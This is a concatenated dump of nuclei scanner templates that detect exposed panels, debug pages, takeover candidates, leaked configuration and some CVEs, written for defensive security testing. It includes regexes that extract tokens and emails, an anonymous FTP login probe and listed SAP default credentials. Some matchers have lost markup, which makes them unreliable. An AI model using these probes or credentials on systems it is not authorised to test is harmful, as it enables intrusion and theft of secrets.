"amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" 19 | -------------------------------------------------------------------------------- /miscellaneous/email-extractor.yaml: -------------------------------------------------------------------------------- 1 | 
id: email-extractor 2 | 3 | info: 4 | name: Email Extractor 5 | author: panch0r3d 6 | severity: info 7 | tags: misc,email 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | extractors: 15 | - type: regex 16 | part: body 17 | regex: 18 | - "[a-zA-Z0-9-_.]{4,}@[A-Za-z0-9_-]+[.](com|org|net|io|gov|co|co.uk|com.mx|com.br|com.sv|co.cr|com.gt|com.hn|com.ni|com.au|com.cn)" 19 | -------------------------------------------------------------------------------- /misconfiguration/laravel-debug-error.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-debug-error 2 | 3 | info: 4 | name: Laravel Debug Mode Enabled 5 | author: dhiyaneshDK 6 | severity: medium 7 | tags: debug,laravel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - Whoops! There was an error 19 | 20 | - type: status 21 | status: 22 | - 500 -------------------------------------------------------------------------------- /takeovers/aftership-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: aftership-takeover 2 | 3 | info: 4 | name: Aftership Takeover Detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - Oops.

The page you're looking for doesn't exist. -------------------------------------------------------------------------------- /takeovers/hubspot-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: hubspot-takeover 2 | 3 | info: 4 | name: hubspot takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - "Domain not found" 19 | - "does not exist in our system" 20 | condition: and -------------------------------------------------------------------------------- /takeovers/proposify-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: proposify-takeover 2 | 3 | info: 4 | name: proposify takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - If you need immediate assistance, please contact Welcome to nginx!" 
18 | part: body 19 | -------------------------------------------------------------------------------- /technologies/xxljob-admin-detect.yaml: -------------------------------------------------------------------------------- 1 | id: xxljob-admin-detect 2 | 3 | info: 4 | name: XXLJOB Admin Login 5 | author: pdteam 6 | severity: info 7 | tags: tech,xxljob 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/xxl-job-admin/toLogin" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | words: 19 | - "XXLJOB" 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /vulnerabilities/other/aspnuke-openredirect.yaml: -------------------------------------------------------------------------------- 1 | id: aspnuke-openredirect 2 | 3 | info: 4 | name: ASP-Nuke Open Redirect 5 | author: pdteam 6 | severity: low 7 | tags: aspnuke,redirect 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569" 13 | matchers: 14 | - type: regex 15 | part: body 16 | regex: 17 | - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$' -------------------------------------------------------------------------------- /workflows/magento-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: magento-workflow 2 | 3 | info: 4 | name: Magento Security Checks 5 | author: TechbrunchFR 6 | description: A simple workflow that runs all Magento related nuclei templates on a given target. 
7 | 8 | workflows: 9 | - template: technologies/magento-detect.yaml 10 | subtemplates: 11 | - template: exposures/configs/magento-config.yaml 12 | - template: exposed-panels/magento-admin-panel.yaml 13 | - template: vulnerabilities/magento/ -------------------------------------------------------------------------------- /workflows/vbulletin-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: vbulletin-workflow 2 | 3 | info: 4 | name: vBulletin Security Checks 5 | author: pdteam 6 | description: A simple workflow that runs all vBulletin related nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/tech-detect.yaml 10 | matchers: 11 | - name: vbulletin 12 | subtemplates: 13 | - template: cves/2019/CVE-2019-16759.yaml 14 | - template: cves/2020/CVE-2020-12720.yaml 15 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea to improve nuclei templates 4 | title: "[Feature] " 5 | labels: '' 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Is your feature request related to a problem? Please describe.** 11 | 12 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 13 | 14 | **Describe the solution you'd like** 15 | 16 | A clear and concise description of what you want to happen. 
17 | -------------------------------------------------------------------------------- /exposed-panels/ems-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: ems-login-panel 2 | 3 | info: 4 | name: EMS Login page detection 5 | author: __Fazal 6 | severity: info 7 | tags: panel,ems 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/EMSWebClient/Login.aspx' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "EMS Web Client - Login" 23 | -------------------------------------------------------------------------------- /exposed-panels/securenvoy-panel.yaml: -------------------------------------------------------------------------------- 1 | id: securenvoy-panel 2 | 3 | info: 4 | name: SecurEnvoy Admin Login 5 | author: 0xrod 6 | severity: info 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/secadmin/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - '' 19 | part: body 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /exposed-panels/yarn-manager-exposure.yaml: -------------------------------------------------------------------------------- 1 | id: yarn-manager-exposure 2 | 3 | info: 4 | name: Apache Yarn ResourceManager Exposure / Unauthenticated Access 5 | author: pdteam 6 | severity: low 7 | tags: panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/cluster/cluster' 13 | matchers: 14 | - type: word 15 | words: 16 | - 'hadoop' 17 | - 'resourcemanager' 18 | - 'logged in as: dr.who' 19 | condition: and -------------------------------------------------------------------------------- /exposures/apis/strapi-page.yaml: -------------------------------------------------------------------------------- 1 | id: strapi-page 2 | 3 | info: 4 | name: Strapi 
Page 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+your+Strapi+app%22 8 | tags: api,strapi 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Welcome to your Strapi app' 19 | condition: and 20 | -------------------------------------------------------------------------------- /exposures/logs/rails-debug-mode.yaml: -------------------------------------------------------------------------------- 1 | id: rails-debug-mode 2 | 3 | info: 4 | name: Rails Debug Mode Enabled 5 | author: pdteam 6 | severity: medium 7 | tags: logs,rails,exposure 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/1238a92f573a48e58d356c42ca2c9610" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Rails.root:" 17 | - "Action Controller: Exception caught" 18 | condition: and 19 | part: body -------------------------------------------------------------------------------- /exposures/tokens/microsoft/microsoft-teams-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: microsoft-teams-webhook 2 | 3 | info: 4 | name: Microsoft Teams Webhook Disclosure 5 | author: Ice3man 6 | severity: info 7 | tags: exposure,token 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | extractors: 14 | - type: regex 15 | part: body 16 | regex: 17 | - 'https://outlook\.office\.com/webhook/[A-Za-z0-9\-@]+/IncomingWebhook/[A-Za-z0-9\-]+/[A-Za-z0-9\-]+' -------------------------------------------------------------------------------- /iot/contacam.yaml: -------------------------------------------------------------------------------- 1 | id: contacam 2 | 3 | info: 4 | name: ContaCam 5 | author: dhiyaneshDk 6 | severity: low 7 | reference: https://www.exploit-db.com/ghdb/6831 8 | tags: iot 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | matchers-condition: and 15 | 
matchers: 16 | - type: word 17 | words: 18 | - 'ContaCam' 19 | part: body 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /miscellaneous/addeventlistener-detect.yaml: -------------------------------------------------------------------------------- 1 | id: addeventlistener-detect 2 | 3 | info: 4 | name: AddEventlistener detection 5 | author: yavolo 6 | severity: info 7 | tags: xss 8 | reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 'window.addEventListener(' 19 | part: body -------------------------------------------------------------------------------- /misconfiguration/druid-monitor.yaml: -------------------------------------------------------------------------------- 1 | id: druid-monitor 2 | info: 3 | name: Druid Monitor Unauthorized Access 4 | author: ohlinge 5 | severity: high 6 | tags: druid,unauth 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/druid/index.html" 12 | 13 | matchers-condition: and 14 | matchers: 15 | - type: word 16 | words: 17 | - 'Druid Stat Index' 18 | 19 | - type: status 20 | status: 21 | - 200 22 | -------------------------------------------------------------------------------- /takeovers/frontify-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: frontify-takeover 2 | 3 | info: 4 | name: frontify takeover detection 5 | author: pdteam 6 | severity: high 7 | tags: takeover 8 | reference: https://github.com/EdOverflow/can-i-take-over-xyz 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | words: 18 | - 404 - Page Not Found 19 | - Oops… looks like you got lost 20 | condition: and -------------------------------------------------------------------------------- 
/technologies/itop-detect.yaml: -------------------------------------------------------------------------------- 1 | id: itop-detect 2 | 3 | info: 4 | name: iTop Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,itop 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/pages/UI.php" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "iTop login" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/node-red-detect.yaml: -------------------------------------------------------------------------------- 1 | id: node-red-detect 2 | 3 | info: 4 | name: Node RED Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,apache 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Node-RED" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /technologies/yapi-detect.yaml: -------------------------------------------------------------------------------- 1 | id: yapi-detect 2 | 3 | info: 4 | name: YApi Detect 5 | author: pikpikcu 6 | severity: info 7 | tags: tech,yapi 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "YApi-高效、易用、功能强大的可视化接口管理平台" 21 | 22 | - type: status 23 | status: 24 | - 200 25 | -------------------------------------------------------------------------------- /workflows/cockpit-workflow.yaml: -------------------------------------------------------------------------------- 1 | id: cockpit-workflow 2 | 3 | info: 4 | name: Agentejo Cockpit Security Checks 5 | author: dwisiswant0 6 | description: A simple workflow that runs all Agentejo Cockpit related 
nuclei templates on a given target. 7 | 8 | workflows: 9 | - template: technologies/cockpit-detect.yaml 10 | subtemplates: 11 | - template: cves/2020/CVE-2020-35846.yaml 12 | - template: cves/2020/CVE-2020-35847.yaml 13 | - template: cves/2020/CVE-2020-35848.yaml -------------------------------------------------------------------------------- /exposed-panels/jfrog.yaml: -------------------------------------------------------------------------------- 1 | id: jfrog-login 2 | 3 | info: 4 | name: JFrog Login 5 | author: dhiyaneshDK 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/6797 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/ui/login/' 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'JFrog' 20 | - type: status 21 | status: 22 | - 200 23 | -------------------------------------------------------------------------------- /exposed-panels/octoprint-login.yaml: -------------------------------------------------------------------------------- 1 | id: octoprint-panel 2 | 3 | info: 4 | name: OctoPrint Login 5 | author: affix 6 | severity: info 7 | tags: octoprint,panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}" 13 | - "{{BaseURL}}/login/" 14 | 15 | matchers-condition: and 16 | matchers: 17 | - type: word 18 | words: 19 | - 'OctoPrint Login' 20 | 21 | - type: status 22 | status: 23 | - 200 -------------------------------------------------------------------------------- /exposed-panels/openerp-database.yaml: -------------------------------------------------------------------------------- 1 | id: openerp-database 2 | 3 | info: 4 | name: OpenERP database instances 5 | author: impramodsargar 6 | severity: info 7 | tags: openerp,panel 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/web/database/selector/" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: word 17 | words: 18 | - 'Odoo' 19 | 20 | - type: status 21 | status: 22 | - 
200 -------------------------------------------------------------------------------- /exposed-panels/zenario-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: zenario-login-panel 2 | 3 | info: 4 | name: Zenario Admin login 5 | author: __Fazal 6 | severity: info 7 | tags: panel,zenario 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/zenario/admin/welcome.php' 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "Welcome to Zenario" 23 | -------------------------------------------------------------------------------- /exposures/tokens/generic/shoppable-token.yaml: -------------------------------------------------------------------------------- 1 | id: shoppable-token 2 | 3 | info: 4 | name: Shoppable Service Auth Token 5 | author: philippedelteil 6 | severity: info 7 | reference: https://ask.shoppable.com/knowledge/quick-start-api-guide 8 | tags: exposure,shoppable,token 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - "{{BaseURL}}" 14 | 15 | matchers: 16 | - type: word 17 | part: body 18 | words: 19 | - data-shoppable-auth-token 20 | -------------------------------------------------------------------------------- /network/starttls-mail-detect.yaml: -------------------------------------------------------------------------------- 1 | id: starttls-mail-detect 2 | 3 | info: 4 | name: STARTTLS Mail Server Detect 5 | author: r3dg33k 6 | severity: info 7 | tags: mail,starttls,network 8 | 9 | network: 10 | - inputs: 11 | - data: "65686c6f20636865636b746c730a" 12 | type: hex 13 | read-size: 2048 14 | 15 | host: 16 | - "{{Hostname}}" 17 | - "{{Hostname}}:25" 18 | 19 | matchers: 20 | - type: word 21 | words: 22 | - "250-STARTTLS" 23 | -------------------------------------------------------------------------------- /takeovers/launchrock-takeover.yaml: 
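# --- /takeovers/launchrock-takeover.yaml ---
id: launchrock-takeover

info:
  name: launchrock takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      # Body text LaunchRock serves for a hostname that points at it but is not
      # claimed by any project; confirm the dangling CNAME before reporting.
      - type: word
        words:
          - It looks like you may have taken a wrong turn somewhere. Don't worry...it happens to all of us.
---
# --- /takeovers/pingdom-takeover.yaml ---
id: pingdom-takeover

info:
  name: pingdom takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      # Either phrase is the Pingdom "public report not claimed" page.
      - type: word
        words:
          - Public Report Not Activated
          - This public report page has not been activated by the user
---
# --- /takeovers/worksites-takeover.yaml ---
id: worksites-takeover

info:
  name: worksites takeover detection
  author: melbadry9
  severity: high
  tags: takeover
  reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      # Note the typographic apostrophes (U+2019) in the second alternative;
      # they are what the service actually emits, so do not "fix" them.
      - type: regex
        regex:
          - "(?:Company Not Found|you’re looking for doesn’t exist)"
---
# --- /technologies/basic-auth-detection.yaml ---
id: basic-auth-detection

info:
  name: Basic auth detection
  author: w4cky_
  severity: info
  tags: tech,basic-auth

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 401

      # Restrict the challenge to the Basic scheme. Matching a bare
      # "Www-Authenticate:" header would also fire on Digest, Bearer, NTLM and
      # Negotiate challenges, which are not Basic auth. Header names are
      # case-insensitive on the wire, hence the (?i) flag.
      - type: regex
        part: header
        regex:
          - "(?i)www-authenticate:\\s*basic"
---
# --- /technologies/default-fastcgi-page.yaml ---
id: default-fastcgi-page

info:
  name: Fastcgi Default Test Page
  author: dhiyaneshDk
  severity: info
  tags: tech,fastcgi
  reference: https://www.shodan.io/search?query=http.title%3A%22FastCGI%22

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      # Untouched TurnKey appliance landing page: the host was never configured.
      - type: word
        part: body
        words:
          - "TurnKey NGINX PHP FastCGI Server"
---
# --- /technologies/default-openresty.yaml ---
id: default-openresty

info:
  name: OpenResty Default Page
  author: dhiyaneshDk
  severity: info
  # Tag corrected from "openrestry" so -tags filtering finds this template.
  tags: tech,openresty
  reference: https://www.shodan.io/search?query=http.title%3A%22Welcome+to+OpenResty%21%22

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        part: body
        words:
          - "Welcome to OpenResty!"
---
# --- /technologies/firebase-detect.yaml ---
id: firebase-detect

info:
  name: firebase detect
  author: organiccrap
  severity: low
  reference: http://ghostlulz.com/google-exposed-firebase-database/
  tags: tech,firebase

requests:
  - method: GET
    path:
      # FIREBASE_SECRET is a deliberately bogus token: the error reply below
      # only proves the host is a Firebase Realtime Database, not that its
      # rules are readable. Do not treat a hit as a misconfiguration by itself.
      - "{{BaseURL}}/.settings/rules.json?auth=FIREBASE_SECRET"

    matchers:
      - type: word
        part: body
        words:
          - "Could not parse auth token"
---
# --- /technologies/jeedom-detect.yaml ---
id: jeedom-detect

info:
  name: Jeedom Detect
  author: pikpikcu
  severity: info
  tags: tech,jeedom

requests:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?v=d"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Jeedom"

      - type: status
        status:
          - 200
---
# --- /technologies/sage-detect.yaml ---
id: sage-detect

info:
  name: Sage X3 Detect
  author: pikpikcu
  severity: info
  tags: tech,sage

requests:
  - method: GET
    path:
      - "{{BaseURL}}/auth/login/page"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Sage X3"

      - type: status
        status:
          - 200
---
# --- /exposed-panels/go-anywhere-client.yaml ---
id: go-anywhere-client

info:
  name: GoAnywhere client login detection
  author: iamthefrogy
  severity: info
  tags: panel

requests:
  - method: GET
    path:
      - "{{BaseURL}}/webclient/Login.xhtml"

    # The login page commonly redirects once (e.g. to a session URL); follow a
    # bounded number of hops so the fingerprint is read from the final page.
    redirects: true
    max-redirects: 2
    matchers:
      - type: word
        words:
          - "Powered by GoAnywhere"
          - "GoAnywhere.com"
        condition: or
---
# --- /exposed-panels/joomla-panel.yaml ---
id: joomla-panel

info:
  name: Joomla Panel
  author: its0x08
  severity: info
  tags: panel,joomla

requests:
  - method: GET
    path:
      - "{{BaseURL}}/administrator/"
    matchers:
      - type: word
        words:
          # NOTE(review): the listing this was taken from had a second, empty
          # marker ('') here — an HTML tag lost in export. An empty word matches
          # every response, so with condition: or the template fired on every
          # host. It is dropped; restore the real markup marker from upstream.
          - '/administrator/templates/isis/images/joomla.png'
        condition: or
---
# --- /exposed-panels/powerlogic-ion.yaml ---
id: powerlogic-ion

info:
  name: PowerLogic ION Exposed
  author: dhiyaneshDK
  severity: low
  reference: https://www.exploit-db.com/ghdb/6810
  tags: panel

requests:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers-condition: and
    matchers:
      # Power-metering web UI reachable from the scan origin (OT exposure).
      - type: word
        words:
          - 'PowerLogic ION'
      - type: status
        status:
          - 200
---
# --- /exposed-panels/sap-netweaver-portal.yaml ---
id: sap-netweaver-portal

info:
  name: SAP NetWeaver Portal
  author: organiccrap
  severity: info
  tags: panel,sap

# Vendor-documented default accounts worth checking manually on a hit
# (this template does NOT attempt them): SAP*/06071992 or TMSADM/$1Pawd2&

requests:
  - method: GET
    path:
      - "{{BaseURL}}/irj/portal"
    matchers:
      - type: word
        part: body
        words:
          - "SAP NetWeaver Portal"
---
# --- /exposures/configs/symfony-profiler.yaml ---
id: symfony-profiler

info:
  name: Symfony Profiler
  author: pdteam
  severity: high
  tags: config,exposure,symfony

requests:
  - method: GET
    path:
      # The profiler is a dev-only tool; when reachable it exposes recent
      # requests, session data and configuration to anyone.
      - "{{BaseURL}}/_profiler/empty/search/results?limit=10"
    matchers:
      - type: word
        part: body
        words:
          - "Symfony Profiler"
          - "symfony/profiler/"
        condition: and
---
# --- /technologies/default-asp.net-page.yaml ---
id: default-asp.net-page

info:
  name: ASP.Net Test Page
  author: dhiyaneshDk
  severity: info
  tags: tech,asp
  reference: https://www.shodan.io/search?query=http.title%3A%22Home+Page+-+My+ASP.NET+Application%22

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        part: body
        words:
          - "Home Page - My ASP.NET Application"
---
# --- /technologies/default-plesk-page.yaml ---
id: default-plesk-page

info:
  name: Plesk Default Test Page
  author: dhiyaneshDk
  severity: info
  tags: tech,plesk
  reference: https://www.shodan.io/search?query=http.title%3A%22Web+Server%27s+Default+Page%22

requests:
  - method: GET
    path:
      - '{{BaseURL}}'
    matchers:
      - type: word
        part: body
        words:
          - "Web Server's Default Page"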
-------------------------------------------------------------------------------- /technologies/opencast-detect.yaml: -------------------------------------------------------------------------------- 1 | id: opencast-detect 2 | 3 | info: 4 | name: Opencast detect 5 | author: cyllective 6 | severity: info 7 | description: Detects Opencast 8 | tags: tech,opencast 9 | reference: 10 | - https://github.com/opencast/opencast 11 | 12 | requests: 13 | - method: GET 14 | path: 15 | - "{{BaseURL}}/admin-ng/login.html" 16 | 17 | matchers: 18 | - type: word 19 | part: body 20 | words: 21 | - 'Opencast' 22 | -------------------------------------------------------------------------------- /cves/2020/CVE-2020-13927.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-13927 2 | 3 | info: 4 | name: Unauthenticated Airflow Experimental REST API 5 | author: pdteam 6 | severity: critical 7 | tags: cve,cve2020,apache,airflow,unauth 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - '{{BaseURL}}/api/experimental/latest_runs' 13 | 14 | matchers: 15 | - type: word 16 | words: 17 | - '"dag_run_url":' 18 | - '"dag_id":' 19 | - '"items":' 20 | condition: and 21 | -------------------------------------------------------------------------------- /exposed-panels/airflow-panel.yaml: -------------------------------------------------------------------------------- 1 | id: airflow-panel 2 | 3 | info: 4 | name: Airflow Admin login 5 | author: pdteam 6 | severity: info 7 | tags: panel,apache,airflow 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/admin/airflow/login" 13 | 14 | matchers-condition: and 15 | matchers: 16 | 17 | - type: word 18 | part: body 19 | words: 20 | - "Airflow - Login" 21 | 22 | - type: status 23 | status: 24 | - 200 -------------------------------------------------------------------------------- /exposures/configs/amazon-docker-config-disclosure.yaml: 
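id: amazon-docker-config-disclosure

info:
  name: Dockerrun AWS Configuration Exposure
  author: pdteam
  severity: medium
  tags: config,exposure,aws,devops

requests:
  - method: GET
    path:
      # Elastic Beanstalk Docker manifest; it can reveal image names, ports
      # and volume mappings of the deployment.
      - '{{BaseURL}}/Dockerrun.aws.json'
    matchers:
      - type: word
        words:
          - 'AWSEBDockerrunVersion'
          - 'containerDefinitions'
        condition: and
---
# --- /exposures/logs/npm-log-file.yaml ---
id: npm-log-file

info:
  name: Publicly accessible NPM Log file
  author: sheikhrishad
  severity: low
  tags: npm,logs,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/npm-debug.log"

    matchers-condition: and
    matchers:
      # First line npm writes to its debug log.
      - type: word
        words:
          - "info it worked if it ends with ok"

      - type: status
        status:
          - 200
---
# --- /misconfiguration/rack-mini-profiler.yaml ---
id: rack-mini-profiler

info:
  # Spelling of the name fixed ("environmnet information discloure").
  name: rack-mini-profiler environment information disclosure
  author: vzamanillo
  severity: high
  tags: config,debug

requests:
  - method: GET
    path:
      # ?pp=env makes rack-mini-profiler dump the Rack environment, which
      # includes the process environment variables (often secrets).
      - "{{BaseURL}}/?pp=env"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "Rack Environment"
      - type: status
        status:
          - 200
---
# --- /network/unauth-ftp.yaml ---
id: unauth-ftp

info:
  name: FTP Anonymous Login
  author: C3l3si4n
  severity: medium
  reference: https://tools.ietf.org/html/rfc2577
  tags: network,ftp

network:
  - inputs:
      - data: "USER anonymous\r\nPASS nuclei\r\n"

    host:
      - "{{Hostname}}"
      - "{{Hostname}}:21"

    # Matchers default to OR: either the server-specific banner text or the
    # protocol-level success reply indicates the anonymous login succeeded.
    matchers:
      - type: word
        part: all
        words:
          - "Anonymous access allowed,"

      # RFC 959 reply code 230 ("User logged in, proceed") after PASS, covering
      # servers whose banner wording differs. "230-" is the multi-line form.
      - type: regex
        part: all
        regex:
          - "(?m)^230[ -]"
---
# --- /takeovers/cargocollective-takeover.yaml ---
id: cargocollective-takeover

info:
  name: cargocollective takeover detection
  author: pdteam
  severity: high
  tags: takeover
  reference: https://github.com/EdOverflow/can-i-take-over-xyz

requests:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: word
        words:
          # NOTE(review): both markers lost their HTML tags in this rendering.
          # The first is now an empty string, which matches every response, so
          # the AND below degrades to "body contains 404 Not Found" — any
          # generic 404 page would be reported as a high-severity takeover.
          # Restore the exact markup from upstream before using this template.
          - ''
          - '404 Not Found'
        condition: and
---
# --- /technologies/airflow-detect.yaml ---
id: airflow-detect

info:
  name: Apache Airflow
  author: pdteam
  severity: info
  tags: tech,apache,airflow

requests:
  - method: GET
    path:
      # A random path forces Airflow's distinctive 404 page.
      - "{{BaseURL}}/{{randstr}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Airflow 404 = lots of circles"

      - type: status
        status:
          - 404
---
# --- /technologies/daybyday-detect.yaml ---
id: daybyday-detect

info:
  name: DaybydayCRM Detect
  author: pikpikcu
  severity: info
  tags: tech,daybyday

requests:
  - method: GET
    path:
      - "{{BaseURL}}/login"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Daybyday - Login"

      - type: status
        status:
          - 200
---
# --- /technologies/teradici-pcoip.yaml ---
id: teradici-pcoip

info:
  name: Teradici PCoIP Detection
  author: pdteam
  severity: info
  tags: tech,pcoip

requests:
  - method: GET
    path:
      - "{{BaseURL}}/info/"

    matchers:
      - type: word
        words:
          - "PCoIP Connection Manager"

    extractors:
      # Pulls the version string that follows the product name for triage.
      - type: regex
        group: 1
        regex:
          - 'PCoIP Connection Manager\/([0-9.]+)\.'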
-------------------------------------------------------------------------------- /vulnerabilities/jira/jira-unauthenticated-projects.yaml: -------------------------------------------------------------------------------- 1 | id: jira-unauthenticated-projects 2 | 3 | info: 4 | name: Jira Unauthenticated Projects 5 | author: TechbrunchFR 6 | severity: info 7 | tags: atlassian,jira 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/rest/api/2/project?maxResults=100" 13 | matchers: 14 | - type: word 15 | words: 16 | - 'projects' 17 | - 'startAt' 18 | - 'maxResults' 19 | condition: and 20 | -------------------------------------------------------------------------------- /exposed-panels/glpi-login.yaml: -------------------------------------------------------------------------------- 1 | id: glpi-login 2 | 3 | info: 4 | name: GLPI - Аутентификация 5 | author: dhiyaneshDk 6 | severity: info 7 | reference: https://www.exploit-db.com/ghdb/7002 8 | tags: panel 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}' 14 | - '{{BaseURL}}/glpi/' 15 | 16 | matchers: 17 | - type: word 18 | words: 19 | - 'GLPI - Аутентификация' 20 | - 'GLPI Copyright' 21 | condition: and 22 | -------------------------------------------------------------------------------- /exposed-panels/sitecore-login-panel.yaml: -------------------------------------------------------------------------------- 1 | id: sitecore-login-panel 2 | 3 | info: 4 | name: Sitecore Login Panel 5 | author: b4uh0lz 6 | severity: info 7 | tags: panel,sitecore 8 | 9 | requests: 10 | - method: GET 11 | path: 12 | - "{{BaseURL}}/sitecore/admin/login.aspx" 13 | 14 | matchers-condition: and 15 | matchers: 16 | - type: status 17 | status: 18 | - 200 19 | 20 | - type: word 21 | words: 22 | - "Sitecore Login" 23 | part: body -------------------------------------------------------------------------------- /exposed-panels/synnefo-admin-panel.yaml: 
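id: synnefo-admin-panel

info:
  name: Synnefo Admin Panel Exposure
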